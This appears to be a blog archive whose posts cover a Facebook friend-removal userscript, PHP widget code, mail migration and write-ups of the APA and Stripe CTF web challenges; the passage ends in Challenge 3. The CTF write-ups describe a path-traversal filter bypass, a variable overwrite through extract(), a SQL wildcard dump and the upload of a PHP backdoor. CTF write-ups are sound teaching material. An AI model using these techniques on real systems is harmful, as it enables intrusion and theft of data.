AbiusX

Mass Removing Facebook Friends

AbiusX — Thu, 21 Mar 2013 21:44:43 +0000

I have Googled around on how to mass remove facebook friends from time to time. Unfortunately facebook does not allow that, because its bad for business; but many people are looking for a hack around. Back in the day, the mobile version had a much easier friend removal process, but they’ve made it similar to the desktop version and very boring. The current method of removing a friend, involves either going to his/her profile or to your list of friends, hovering over friend-status button (first request), selecting unfriend (second request), confirming it (third request), approving the removal (forth request). Each of those asynchronous operations need to be done synchronously, because the confirmation dialogs take half of the page; so assuming each one takes half a second, it takes 3 seconds to remove a friend (on a delay-free connection). Now what if you have 4000 friends (many of which are taking dust) and you want to remove around 3000 of them? Welcome to hell. If you take up the manual approach, you’re bound to drop midway, because it takes more than 4 hours and drives you nuts. There are scripts around that usually don’t work, and are mostly non-user-friendly. I decided to filter my friend list today, and when I got to it, I realized it would be much better to spend those 4 hours creating something that others can use as well, instead of doing some repetitive work (which is literal hell for developers and hackers). So I made this script:

http://userscripts.org/scripts/show/162656

It’s a robust script run inside GreaseMonkey (for Firefox) or TamperMonkey (for Chrome), which are basically environments to run hack scripts for different websites. The script does not work on non-recent browsers and on Internet Explorer. I suggest using fresh Google Chrome, as the script is CPU intensive and Google Chrome is the best for rapid Javascript evaluation.

After installing the script in your grease environment, and enabling it (you should disable it after you’re done, as it messes with facebook dialogs), head to your friends edit page (https://facebook.com/friends/edit), and you should see Fast Remove buttons next to every active friend’s picture. The edit friends page of facebook only displays a handfull of friends, but scrolling to the bottom adds another handfull to the page. You can put some adequately heavy object on your Page Down keyboard button, and leave it be until all friends are listed.

Now the first thing to do, is delete all your inactive friends (people who have disabled their facebook accounts). 90% of them never get back to facebook, and those who do, can go ahead and add you again. From the TamperMonkey (or equivalent) menu, click on FacebookDeleteX – Remove Inactive submenu. A confirmation box will appear, saying how many inactive friends found, and if you’re sure to delete them all. After clicking yes, all deletions are queued and another dialog gives you some information.

At this step, you should wait (or you can start doing the fast removal – next step). Because each removal requires 4 steps (requests to be made by the script), each one of them takes some time to accomplish. Closing the page will cancel them. If you’re removing 1000 inactive friends, you should wait at least 1000×3 seconds (or an hour). You can always check your number of friends before starting this, and check it again in another window and see when it reaches the desired amount (total_number – inactive_number), then close this window.

The final step, is manual fast-removal of your friends. In this step, you have to click on each Fast Remove button, next to people who you don’t want anymore. Don’t spend too much time deciding if something belongs or not, just press Fast Remove. Later you can add them again easily.

Every time you press Fast Remove, it takes a second or so for the requests to be handled and for the button to disappear (if you’ve a lot of requests queued from previous step, it can take a lot. Just click them once and proceed to the next one, or open another window and do this there) . Right after that, a dialog box pops up informing you that the friend was removed. This script will automatically close these dialogs once every second.

If anything seemed not to work with the script, don’t hesitate to contact me for a fix. Happy facebooking.

P.S this script takes 60% CPU on a MacBook Pro Retina (which is equivalent of 4 regular PCs).

Meta-Reflection variable name detection problem for Pull Widgets in PHP

AbiusX — Tue, 19 Mar 2013 12:36:31 +0000

First of all, Happy Nowruz! Tomorrow is officially the new Jalali year‘s start. Best of wishes to everyone.

The Problem

I’ve been working on an elegant design for a new PHP Widget library for some time now. It is intended to provide a Pull MVC feature for jframework. As you know, MVC provides a separation of concerns, allowing different expertise people to work separately on their designated part of the application. The model part (which is the business logic of the application, plus some of the solution domain) is usually very re-usable and employs object oriented to great extent. The controller part, is mostly lightweight and consists of code usually not re-usable.

The problem resides in the view part of the MVC. Views are mostly HTML/CSS that dump some variables and arrays. Sometimes templates are employed in views, to reduce repeated code, but still most of the views are repeated code. Imagine two different areas of a web application, both providing tabular data of different origin. 70% of their code is the same but due to difference of data nature, usually no re-using is done.

I’m not gonna talk about benefits of code re-use here, but you get the picture.

Pull MVC, in contrast to Push MVC, is a system in which the view asks for content to render themselves by pulling them in, instead of pushing the content directly on the screen. It is usually provided by widget systems, and is much more object oriented. The problem with Pull systems is that view is usually designed and not developed, by a graphical designer who is adept in HTML and CSS.

The Actual Thingie

The first thing I wanted to do, was to preserve maximum simplicity. You can not expect a library to require redundancy to provide code re-use. I do not like libraries that take control of everything and don’t let developers to change their mechanics. So I wanted to replace this practice:

$form1 = new jForm();
$form1->setName("form1");
$form1->setMethod("post");
$button1 = new jFormButton("form1");
$button1->setName("button1");
$button1->setLabel("Push Me!");

To a single liner elegant approach:

$form1 = new jForm(jForm::Method_Post);
$button1 = new jFormButton($form1, "Push Me!");

So the first thing I needed to be done, was for jForm (or any other jWidget instance) to know what variable it is assigned to – in this case $form1 – and name itself after it. The name is actually used a lot in the generated HTML code, for validation, for CSRF protection, for HTML form element names, for HTML IDs, for CSS classes and a lot more.

There were two proposed methods over the net. One was to employ get_defined_vars PHP function to get a list of variables, and then compare them with $this inside the class constructor to generate the name. It required you to code like this:

$form1 = new jForm(get_defined_vars());

Because get_defined_vars returns the list of variables in each scope. Not very elegant, but still worth a shot if it was working. There are two problems with this approach, first is that every value-equal variable (though not the same) is matched, and second something that I’ll describe later.

The other approach was to get_defined_vars, change the variable and get_defined_vars again, comparing them and finding our variable. Unfortunately $this can not be changed.

The second problem, rendering both methods perfectly useless was that $form1 is not defined at the point the constructor is called, because first the right hand of the assignment is evaluated – thus calling the constructor – and then the left hand side is assigned.

The Solution

I would not let go of my desired design, as I was aware that an inconvenient library would simply not be used at all. I will post my solution first, and then describe it. The posted solution is the ParseName method of jWidget class, the base class for all other widgets used to detect their variable names:

private function ParseName()
{
	//first lets find the file who created the widget
	$backtrace = debug_backtrace();
	$backtraceIndex=0;
	//step over all subclasses of jWidget, who called parent constructor to get the name done. Also other methods of this class
	while (isset($backtrace[$backtraceIndex]['class']) &&is_a($backtrace[$backtraceIndex]['class'],"jWidget",true)) $backtraceIndex++;
	$backtraceIndex--;
	$file=$backtrace[$backtraceIndex]['file'];
	$line=$backtrace[$backtraceIndex]['line']; //used in error messages
 
 
	$classname=get_class($this);
 
	if (isset(self::$classInstanceCountPerFile[$file]) and isset(self::$classInstanceCountPerFile[$file][$classname])) 
	//this widget already instantiated in this file, increase count and check for x-th occurance
		self::$classInstanceCountPerFile[$file][$classname]++;
	else
		self::$classInstanceCountPerFile[$file][$classname]=1;
 
	$desiredCount=self::$classInstanceCountPerFile[$file][$classname];
	$currentCount=0;
 
	$php_code = file_get_contents ( $file );
 
	$tokens = token_get_all ( $php_code );
	$count = count ( $tokens );
 
	for($i = 0; $i < $count; $i ++)
	{
		if ($tokens[$i][0]===T_NEW) //found the "new" keyword
		{
			//go forth until you find the classname
			$j=1;
			while ($tokens[$i+$j][0]==T_WHITESPACE) $j++;
			if ($tokens[$i+$j][1]==$classname) //if desired class found, increase count until we reach our desired index
				$currentCount++;
			if ($currentCount==$desiredCount) //found our variable name line, the occurance reached the desired
			{
 
				//go back until you find the assignment sign
				$j=1;
				while ($tokens[$i-$j][0]==T_WHITESPACE) $j++;
				if($tokens[$i-$j]!="=")
				{
					throw new Exception("You should instantiate jWidget by assigning it to a variable, e.g \$someWidget=new jWidget(\$this);
							in file {$file} line {$line} ");
				}
				//go furthur back until you find the variable name
				$j++;
				while ($tokens[$i-$j][0]==T_WHITESPACE) $j++;
				if($tokens[$i-$j][0]!=T_VARIABLE)
				{
					throw new Exception("Could not find variable: You should instantiate jWidget by assigning it to a variable, e.g \$someWidget=new jWidget(\$this);
							in file {$file} line {$line}");
				}
				$variableName=$tokens[$i-$j][1];
				$variableName=substr($variableName,1); //remove the $ sign
				//check if this name already used on another widget
				if (isset(self::$widgetInfo[$variableName]))
					throw new Exception("Name used for widget object at {$file}:{$line} already used for another widget at ".
						self::$widgetInfo[$variableName]['file'].":".self::$widgetInfo[$variableName]['line']);
				//store this new widget information
				self::$widgetInfo[$variableName]=array("class"=>$classname,"file"=>$file,"line"=>$line);
				return $variableName;
			}
		}
	}
	//this should not happen!
	throw new Exception("Could not find appropariate jWidget instanciation in {$file}:{$line} (Maybe you forgot to call parent::__construct(\$Parent) in your widget constructor?)");
}

First, I know that this code can be optimized much, that is not of the essence here. Lines 3 to 10, have the responsibility of finding the callee, i.e the file and the line where the class is instantiated. The file is used for tokenizer and the line for error messages. Lines 12 to 22 will be described later.

Next we tokenize the PHP file and start looping through the tokens until we find a T_NEW (new object) token. From there, we go forward until we find our desired class name (e.g “jForm”). Since many instantiations of the same class could be made in one file, we keep track of them (the counting of lines 12 to 22) so that for the n-th instance of the same class, we search for the n-th occurrence of “new thatClass()”.

When we find that, we go back in tokens searching for an assignment mark. If not found, it is an improper usage (e.g something like $form1 = new jForm(); new jFormButton($form1);) so we trigger an error. Same goes if a variable is not before the assignment mark.

Finally we store the variable name and check if it is not used for any other widget (names are unique). If it is, the line and file of code where the other one is defined are outputted as an error.

The entire approach is pretty straightforward and simple, but it provides for an elegant design. This ends is actually achieved by a middle compiler (such as MOC in Qt) but due to very generic nature of PHP, meta-reflection is easily achieved by a run-time code parser. I will let you know when the library is out, both as a part of jframework and as a stand-alone library

APA CTF 2013 Write-up

AbiusX — Sat, 15 Dec 2012 00:17:10 +0000

This post is about Sharif CERT (APA) center’s recent CTF (10 dec 2012), which is one of a kind in Iran. Most CTFs are a few days long since there are time-zone differences, but since this one is in Iran, its only a few hours long and full of pressure. Also it is fairly general purpose, with Trivia, Web Hacking, Cryptography, Steganography, Reverse Engineering and Forensics amongst it genres. There’s also the final scoreboard of the contest. As usual, team AbiusX nailed this CTF, though this was the initial round and the main round is held inside Sharif University of Technology in Tehran. APA CTF usually pisses me off, as some questions are not technical and more of a puzzle than a question – as you will see soon – and also because the guys in charge of making up questions have a very poor English (rofl). But it’s getting much better over the years and this version was perfectly acceptable, specially the parts about segmenting different teams’ flags. There were 2 trivia questions, 4 web flags, 2 reverse engineering flags and the rest each had one flag. Genre scores were 100 for trivia, 1200 for web, 200 for crypto, 600 for reverse engineering, 300 for steganography and 400 for forensics, plus bonuses for quick solvers.

The Questions

This section will describe each questions, its strengths and weaknesses and the solution to it.

Trivia

The first trivia question was “The tool that Microsoft uses to detect security vulnerabilities in it’s development.“. Answer was of course SAGE (which obviously we couldn’t figure out). In my 5 years of active OWASP involvement, Microsoft is the leading company that benefits from OWASP research and development, without even admitting it. Many open source initiatives (like Mozilla) are reluctant to turn towards OWASP without some bragging. Second trivia was “Malware that asks for money to remove itself.“. These are getting a place in malware world, and are known as ransomware.

Cryptography

The cryptography challenge really crawled up my ass all the way up my brain, as it was a puzzle and not a cryptography challenge. You might know that I’m a crypto nerd, and I’m deeply into advanced number theory, information theory and everything cryptography. When you opened the question link, you would face this:

141592653589793238467926433832795028841971693993751058209749445923078164062862089986280348253425511706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804911095105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019370511253382430035587640247496473263914199272604269922796782354781636009341721641219924586315030286182974555706749838505494588586926995690952272107975093029553211653449872027559602364806654991198818347977535663698074265425278625518184175746728909777727938000816470600161452491921732172147723501414419735685481613611573525521334757418494684385233239073941433345477624168625189835694855620992192221842725502542568876717904941146016534668049886272327917860857843838279679766814541009538837863609506800642251252051173929848960841284886269456042419652850299221066118630674427862203919494504712371378696095636437191657287467764657573962413890865832645995813390478027590099465764078951269468398352595

Now, since there are no plaintext and no hints, this would either be a classic easily-breakable classic cipher, or some sort of encoding (which APA guys generously confuse with encryption). Most classic ciphers operate on alphanumeric inputs and provide alphanumeric outputs, except for a handful (Polybius, Straddling, Bifid, etc.), and that bunch produces a reduces number set (i.e not all numbers are used in the result). I quickly wrote a code to decrypt all the ciphers I knew to use numerical I/O, and ran it on the numbers above; all resulted in gibberish. Then I inspected the numbers for a while, its 2046 characters long, which is 2x3x11x31, and oddly odd combination of primes; so I factored this string into its prime factors in a 4D manner, still no sense. Now I thought maybe it is a commonly known sequence, so I asked my friend Google about it, and it said no results (keep in mind that i copied first 24 characters). Then I ran some analysis using a bunch of tools on the sequence, namely Index of Coincidence, Frequency Analysis (up to 32 letters!) and finally Entropy Analysis. Entropy analysis yielded high entropy, thus the sequence could not be a classic cipher. All classic ciphers have somewhat weak Diffusion and Confusion, so they do not increase the entropy. Side Note for Crypto Newbies: An ideal cipher is like a machine, that receives a ball from you, and outputs some dust. Then when you pour the dust back into the machine, it gives you a ball. In a more technical manner, it increases the information entropy to maximum, so it’s similar to noise; but it has a unique way of turning it back into something structured. To put it in simple words, if you zip a maximum entropy data (like something encrypted with AES), the zipped data would have approximately the same size (since it has no detectable pattern). But if the sequence was a new cipher, there would be no way to crack it! Not without some plaintext, hints, and some parts of a key. So I just left the question be. Solution. Later a hint popped up in news section, saying 3.14. I thought they mean it is 3:14, and not much of the contest is left (I’m too much of a nerd). Later I figured out it’s 3.14 (Pi number), then I searched around and found that this sequence is very similar to extension of Pi number. You must know that Pi number has a sequence with no pattern, and thus the entropy theory. Then I figured out that the sequence is not exactly the Pi number’s decimal part, so I did a quick code to list out the differences, which were (they might’ve been different for other teams): 79 55 1 110 70 52 114 99 65 Now I concatenated these, and entered as a flag, which was rejected. No hint was given to me on what else to do, so I assumed that people in charge have made another mistake, and remove the number “1″ from the result sequence, and then converted each ASCII code to its corresponding character, which was the correct flag. You might ask why the googling did not yield any result, it was because 21st and 22nd letter were injected and were not original Pi number.

Steganography

The link to the question, provided you with an image: Now initial analysis revealed that this is a 256 color Bitmap file. Since I’ve done a few bitmap editors when I was around 12, I know that 256 color bitmaps have a palette in their header that lists 2^8 colors out of 2^18 possible colors (6 bit for R, G and B). I inspected the palette, no obvious pattern. I inspected the colors, no LSB data. I ran every stegano tool I could find on the image, all failed. Then there was a hint in the news section : “Focus on hot theme colors.”. What colors are deemed hot? Later I found out that they mean red variations. Then I filtered the image so that only red colors remain and all look alike. I looked deeply at the image, rotated it at every angle, and the only thing I could see was something similar to sport logos (the ones that show a man swimming or playing basketball in TV news programs). Solution. We did not nail this particular question, as it had absolutely nothing to do with science and technique. It was a brail text converted to an image.

Forensics

The question provided me with a 16mb 7z file, presumably a physical memory dump image of a system. Now what we were supposed to find in it, was yet another question never answered. The biggest problem with APA questions is that they do not clearly state what you should look for, though in real life you always know what ends you’re pursuing. When trying to decompress the file, usual decompressors would argue that it is corrupt. Later I found out that it could only be unzipped by 7zip software (namely 7za executable as I don’t live inside a Windows system). Now we had a 68 MB file, with no absolute idea as to what to search for in it (68MB is a little too much). Later a hint came up, telling that it is intended to be inspected by the Volatility software. I obtained the software, which is in Python. Ran it, it required a bunch of libraries from Google Code. I fetched those too, and ran the tool. It had unlimited options. The image belonged to Windows XP SP3, list of processes showed usual Windows components, as well as two cmd.exe. Now we could dump the console commands typed in those cmd.exe files via the memory image, so I did. They had renamed a CTF3.exe file into conhost.exe and ran it. I dumped the memory image of the conhost.exe file into a real file (executable files are loaded into memory before being executed). Ran it on Windows:

‘conhost’ is not recognized as an internal or external command, operable program or batch file. Error reading registry key!

Inspecting the executable file with some debuggers, revealed that its looking for for Registry Key “Keyboard Layouts\Preload” in HKLM. Now I went there in my Windows machine, and nothing particular was there. Then I dumped the registry value for that key inside the image file (Windows registry is alos loaded into the memory), and the flag was there, fairly easy. The problem was, why the hell would a forensics guy want to check up a stupid common registry key in some memory image?! The philosophy behind the question bugged me greatly.

Reverse Engineering

We were provided with this zip file, which included a readme.txt, a reverse.exe and a libeay32.dll. Since I was an OpenSSL freak, I knew that libeay32.dll belongs to OpenSSL, so the program is presumably using some AES, RSA, or other nasty OpenSSL functionality (you would know what I mean if you worked directly with nasty OpenSSL code). Readme.txt stated that Executable is currently configured to generate flag2 for “SharifCERT”. You should generate and submit flag2 for “Team02″. Inspecting the executable resources revealed a “SharifCERT” string amongst them. Replacing it with Team02 and running the code, gave the first flag, which we got in a few minutes after the beginning of contest. Now for the second flag, some anti-debug features were implemented into the executable file. Finally it became obvious that it references some memory in libeay32.dll file, that is not there. After lots of hours of headache, we figured out that the libeay32.dll opened in the debugger, is actually the one loaded by the operating system earlier, and not the one in executables folder (people unfamiliar with the way Windows handles Dynamic Libraries, just know that is does a very poor job of that). Replacing it with the file in folder, revealed the second flag in that memory spot.

Web Hacking

There were two web challenges, one with 3 flags and 1000 score points, PHP MySQL based, and one with 1 flag and 200 score points, added for the sake of those newbies that can only hack ASPX. Unfortunately the second one had a bug which prevented our team from nailing it, as I’ll describe very soon. The first challenge, had the chase your own tail problem, which was frequent on the contest. You had no idea what they expected you to do, and you were faced with a vast web application, with really nasty code – very hard to keep inside your head – and poor English text. There were four initial pages, a homepage welcoming you, a css page which showed you a copy/pasted page, a downloads page which provided 3 links to download stuff, and a final page asking for email and password to login, with a link to another page asking for valid email to reset password. The download page referenced a /includes/downloader.php file which accepted a GET parameter, namely file, which itself accepted the base64 encoded string of the filename’s reverse. For example to download css.html, you had to base64encode lmth.ssc. This code does exactly that:

Unfortunately, the downloader script would not work correctly with files containing .. and / in their address, so no LFI/RFI. It would just say “File not found”. There was another interesting file mentioned in the css page, namely /includes/css-parser.php which accepted raw GET data, in the form:
css-parser.php?extension,filename1,filename2,…
And would dump the contents of filename1.php, filename2.php and the rest (if provided). Unfortunately, it only allowed you to peek at files inside /includes/ folder, as it had:
$file = preg_replace(‘/[^a-zA-Z0-9\_\-\/]/’, ”, $file); $output .= file_get_contents(dirname(__FILE__) . ‘/’ . $file .’.’.$type) . “\n”;
So, we took a look at downloader.php:
/** FLAG: lol-first-key!.php **/ $filename = $_REQUEST["file"]; $filename = strrev(base64_decode($filename)); $filename = str_replace(‘..’, ”,$filename); $filename = str_replace(‘backups/’,”,$filename); $file = ‘../files/’.$filename; if(file_exists($file) && !is_link($file) && !is_dir($file))
Now the first section which states the flag file, was mistakenly typed as “FLAG: lol” when I first encountered this file. I was amazed at what it could mean, and they never told me. Later they fixed it so I did not get quick-solver’s bonus for this. The code segment uses blacklist filtering, and if you’ve followed what I say at OWASP PHP Security Cheat Sheet (and any other security related article), you’re bound to be pawned if you use that. You should use whitelist filtering, i.e only allowing what you know is safe, and not filtering what you know is unsafe. This code, filters double dots and “backups/” strings, then prepends “../files/” to our input. That’s why we could neither use .. nor use slash in our addresses. Now pawning that is as simple as providing it with:
.backups/./index.php
Now it first checks for double dots, non found, then replaces our “backups/” with nothing, turning our input effectively to “../index.php“. This can never be prevented, even if you put this filtering code inside a while loop. Index.php had:
require_once ‘includes/main.php‘; …
Now the main.php file was interesting, but you couldn’t read it because it had the protection string on its first line. The trick was easy, simply provide css-parser.php?php,downloader,/main so that you get a concatenated output of both files. Main.php referenced a bunch of useful files:
require_once ‘includes/master.auth.php‘; require_once ‘mysql-config-files/config.inc.php‘; require_once ‘mysql-config-files/config2.inc.php‘; require_once ‘classes/mysql.class.php’; require_once ‘classes/auth.class.php‘; require_once ‘includes/password-recovery.php‘;
Now the two interesting files were mysql config files. Hints in the news told us that MySQL port is open from the world, so using the mysql client and the credentials in the file, one could connect to the server, list emails and passwords and even add an email and use forgot password, then login with it and get the 3rd flag (500 scores). The second web challenge, required you to use SQL injection on ASPX server to get into admin.aspx, and read some files via the admin panel and decrypt them to see the flag. Unfortunately the login screen had a bug which caused it to pop an error all the time, regardless of being a wrong password or an actual error. I bypassed it using Soroush’s method on ASPXERRORPATH and also found the admin.aspx myself (which didn’t require login), but since it was buggy, I left the question be. Again, nobody told me that it was fixed so I never returned to it.
Conclusion
Generally, the contest was fairly straightforward and cool, and I and the rest of participants liked it. APA needs better guys on crypto and stegano challenge design, but it’s acceptable for now. Please drop comments about your ideas about this writeup and the contest in general.
APA CTF 2013 Online Scoreboard

Migrating mail from one host to the other

AbiusX — Wed, 31 Oct 2012 12:47:02 +0000

I was in the process of migrating a host from Helm 4 to DirectAdmin, and it seems that Helm is pretty crappy and does not store mail in user’s storage, but instead in its own mail manager, but what else would someone expect of something Windows based. The problem and solution I describe here is applicable to all hosting managers, not just DA and Helm, but I use those in my examples. First step is to transfer files, which is pretty easy. You could zip the whole folder in any control panel (sometimes its referred to as Backup), then get it via wget’s ftp functionality:

wget -r ftp://user:pass@host.com/folder/file.zip

I’m assuming you have SSH access on your destination, or otherwise you have to do everything on your own computer and then move to the destination, which is not very engineery! Then you unzip and relocate the files. Then you have to move databases, which is pretty easy using mysqldump tool and mysql [options] verbose = 1 delete = False [retriever] type = SimpleIMAPRetriever server = sourceMailServer.com username = srcUser password = srcPass [destination] type = Maildir path = ~/imap/domain.com/srcUser/Maildir/ You have to update this file for every mailbox you’re going to migrate, and replace username, password and path accordingly. Then go to the path you describe, see if it exists (it should be your control panels default path or you’re not migrating correctly). If it does not exist, create the folder Maildir with 3 subfolders cur, new, tmp. You could also create the structure by using mutt instead of manually, as follows:

mutt -f imap://user@srcHost.com

It then lists your messages and creates the folder structure for you. Now run getmail, and wait for the magic to happen. It is definitely going to take some time if you have huge email base. You could automated this process for multiple accounts with a simple bash script. This whole process is way faster and easier than any other solutions. Also keep in mind to use IMAP if applicable, otherwise you would only transfer Inbox. Don’t forget to ask your questions below.

PHP Serialization Pollution Attack

AbiusX — Tue, 02 Oct 2012 18:56:17 +0000

PHP Serialization has a fatal flaw which allows for pollution of the scope and global context of an application, as well as running arbitrary code in some scenarios if sources of taint are allowed in. It is a very high impact attack but requires in-depth evaluation criteria and careful inspection to be caught. I have prepared a lab to explore and try this attack, available at:

PHP Serialization Pollution Lab

Give it a try and let me know what you think. I suggest you do a lot of debugging on the code and master its exact running flow. Don’t forget that the source code of that page is available at:

https://abiusx.com/lab/hacking/serialize.src.php

I’m gonna describe this with details in a much later date.

Stripe CTF 2 – Web Challenges

AbiusX — Sun, 26 Aug 2012 02:55:02 +0000

I participated in the Stripe CTF Web Attacks and thus far it was the most well designed CTF I have ever encountered (and I have participated in a couple dozen). This is the second Stripe CTF, the first was exploitation based and this one was web based. Some Concepts CTF stands for Capture the Flag, its a genre of games where you have to get past enemy lines and take their flag and bring it back to your base to win a score. Usually hacking games are CTF like, you have to hack a system, find the flag (its a random string) and bring it to your home to get scores for that level. There are plenty of servers for a CTF host, since many attackers try to just break the servers instead of solving the challenges. Also every participant’s environment has to be secluded to achieve best challenge experiences, so lots of cautious programming on the host side is required. There are almost always lots of bugs on CTFs due to huge codebases, and hackers tend to hack systems in a way that the host didn’t plan of, and get the score; thus the host people have to watch the event and remove those bugs asap, and to respond to questions and feedbacks of the participants. How did I do I participated in this CTF a couple days ago, at midnight. Unfortunately my beloved uncle had just passed away and he had no sons, so I had to take care of much of funeral stuff. I only had a couple hours at midnight (at the cost of not sleeping for the funeral) to participate in this, so I did. I was able to solve 8 out of 9 challenges in almost 3 hours, and left for the funeral chores afterwards. The 8th question was a little lengthy and I returned to it after almost 30 hours (after the funeral and a brief rest) and solved it in a few hours. Below I’m going to discuss the questions and their answers (how to hack them) as an educational document.

Challenges

I’m going to copy the challenges from Stripe-CTF, then provide the solutions in a section below each of them.

Challenge 0 – SQL String Comparison

You completed this level in 312.649 seconds. The password wasoxaMPRwadu. The solution you submitted was: % sql like operator

Welcome to Capture the Flag! If you find yourself stuck or want to learn more about web security in general, we’ve prepared a list of helpful resources for you. You can chat with fellow solvers in the CTF chatroom (also accessible in your favorite IRC client at irc://irc.stripe.com:+6697/ctf). We’ll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes… You can access the Secret Safe at https://level00-2.stripe-ctf.com/user-cqxxidnqrs. The Safe’s code is included below, and can also be obtained via git clone https://level00-2.stripe-ctf.com/user-cqxxidnqrs/level00-code.

Here’s the code for level00.js, the main server file:

// Install dependencies with 'npm install'
// Run as 'node level00.js'

var express = require('express'), // Web framework
    mu = require('mu2'),          // Mustache.js templating
    sqlite3 = require('sqlite3'); // SQLite (database) driver

// Look for templates in the current directory
mu.root = __dirname;

// Set up the DB
var db = new sqlite3.Database('level00.db');
db.run(
  'CREATE TABLE IF NOT EXISTS secrets (' +
    'key varchar(255),' +
    'secret varchar(255)' +
  ')'
);

// Create the server
var app = express();
app.use(express.bodyParser());

function renderPage(res, variables) {
  var stream = mu.compileAndRender('level00.html', variables);
  res.header('Content-Type', 'text/html');
  stream.pipe(res);
}

app.get('/*', function(req, res) {
  var namespace = req.param('namespace');

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

             renderPage(res, {namespace: namespace, secrets: secrets});
           });
  } else {
    renderPage(res, {});
  }
});

app.post('/*', function(req, res) {
  var namespace = req.body['namespace'];
  var secret_name = req.body['secret_name'];
  var secret_value = req.body['secret_value'];

  var query = 'INSERT INTO secrets (key, secret) VALUES (? || "." || ?, ?)';
  db.run(query, namespace, secret_name, secret_value, function(err) {
     if (err) throw err;

           res.header('Content-Type', 'text/html');
           res.redirect(req.path + '?namespace=' + namespace);
         });
});

if (process.argv.length > 2) {
  var socket = process.argv[2];
  console.log("Starting server on UNIX socket " + socket);
  app.listen(socket);
} else {
  console.log("Starting server at http://localhost:3000/");
  app.listen(3000);
}

And here’s the code for level00.html, its mustache.js template:


  
    Secret Safe
  
  
    {{#namespace}}
    
      Showing secrets for {{namespace}}:
      
          {{#secrets}}
          
          {{/secrets}}
          {{^secrets}}
          
          {{/secrets}}
        
        
          
            Key
            Value
          
        
        
            {{ key }}
            {{ secret }}
          

            
              You have no secrets stored with us. Try using the form below.
            
          
      

      
    
    {{/namespace}}

    
      
        Namespace:
        
      
      
        Name of your secret:
        
      
      
        Your secret:
        
      
      
        
      
    
    
      
        Want to retrieve your secrets? View secrets for:

The Solution The web server programming is done via node.js Javascript server-side programming library. If you send some post data (line 45) it parses it and inserts it to the database. If you do a get request (line 30), its gonna dump the pair you have given the key of. Since it uses LIKE in it’s query (line 34) you can use the wildcard character (%) which evaluates true for all strings in the table, so it would dump all the results to the screen, and the one you want is also among them. Keep in mind that it is using prepared statements, so no SQL Injection is possible.

Challenge 1 – PHP Input Validation

You completed this level in 449.956 seconds. The password wasFrXHxPWtlg. The solution you submitted was: provide filename and attempt both empty on get params

Excellent, you are now on Level 1, the Guessing Game. All you have to do is guess the combination correctly, and you’ll be given the password to access Level 2! We’ve been assured that this level has no security vulnerabilities in it (and the machine running the Guessing Game has no outbound network connectivity, meaning you wouldn’t be able to extract the password anyway), so you’ll probably just have to try all the possible combinations. Or will you…? You can play the Guessing Game at https://level01-2.stripe-ctf.com/user-pwadawuqtd. The code for the Game can be obtained fromgit clone https://level01-2.stripe-ctf.com/user-pwadawuqtd/level01-code, and is also included below. The contents of index.php:

Guessing Game

Welcome to the Guessing Game!

Guess the secret combination below, and if you get it right, you'll get the password to the next level!

How did you know the secret combination was" . " $combination!?

"; $next = file_get_contents('level02-password.txt'); echo "

You've earned the password to the access Level 2:" . " $next

"; } else { echo "

Incorrect! The secret combination is not $attempt

"; } } ?>

Solution This is a classic one. PHP developers in the old days used Register_Globals, which was something that added GET and POST parameters as variables in your current scope, thus someone could easily manipulate your variables via GET requests. You should never use untrusted user input in your code context. Here on line 13, extract does that. It gets all the key/pair values from $_GET array and makes them valid variables in current scope. It also overwrites them if already existing. Since the only variable defined before it is $filename, and there are no variables that are used before being set (except for $attempt which is intended to be an input from the user, thus safe), we have to override $filename here. Just entering ?filename=&attempt=& at the end of URL yields the result, since filename and attempt both would be empty strings and they would match perfectly.

Challenge 2 – Local File Inclusion (LFI)

You completed this level in 282.218 seconds. The password waseAepnsrRXY. The solution you submitted was: upload a file.php with echo file_get_contents("../password.txt"); browse to it voila.

You are now on Level 2, the Social Network. Excellent work so far! Social Networks are all the rage these days, so we decided to build one for CTF. Please fill out your profile at https://level02-3.stripe-ctf.com/user-shjuxdnipi. You may even be able to find the password for Level 3 by doing so. The code for the Social Network can be obtained from git clone https://level02-3.stripe-ctf.com/user-shjuxdnipi/level02-code, and is also included below. The contents of index.php:

 0) {
    echo "Error: " . $_FILES["dispic"]["error"] . "";
  }
  else
  {
    $dest_dir = "uploads/";
    $dest = $dest_dir . basename($_FILES["dispic"]["name"]);
    $src = $_FILES["dispic"]["tmp_name"];
    if (move_uploaded_file($src, $dest)) {
      $_SESSION["dispic_url"] = $dest;
      chmod($dest, 0644);
      echo "Successfully uploaded your display picture.";
    }
  }

  $url = "https://upload.wikimedia.org/wikipedia/commons/f/f8/" .
         "Question_mark_alternate.svg";
  if (isset($_SESSION["dispic_url"])) {
    $url = $_SESSION["dispic_url"];
  }

?>


  
    Welcome to the CTF!
  
  
    
      Welcome to the CTF Social Network!
      
         />
        Oh, looks like you don't have a profile image" .
                 " -- upload one now!";
          }
        ?>
        
          
          
        

        
           Password for Level 3 (accessible only to members of the club):
           password.txt

Solution This one is pretty easy and dangerous, but since we need it in our next challenges stay sharp. There’s a file password.txt with webserver deny access, it means that you can not access it via the webserver on your browser. There’s also a dialog to upload your photo, and it puts that in ./uploads/ folder. No checking is done on the upload process, so you can easily upload a PHP file, e.g backdoor.php containing the code :

Then just browse to ./uploads/backdoor.php and see the password on the screen. Actually we can upload anything here even a backdoor shell to access everything on this server, and we’re gonna need it later. This scenario happens on many real world cases.

Challenge 3 – SQL Injection Union Bypassing

You completed this level in 1333.633 seconds. The password wasLDeVchKFIV. The solution you submitted was:

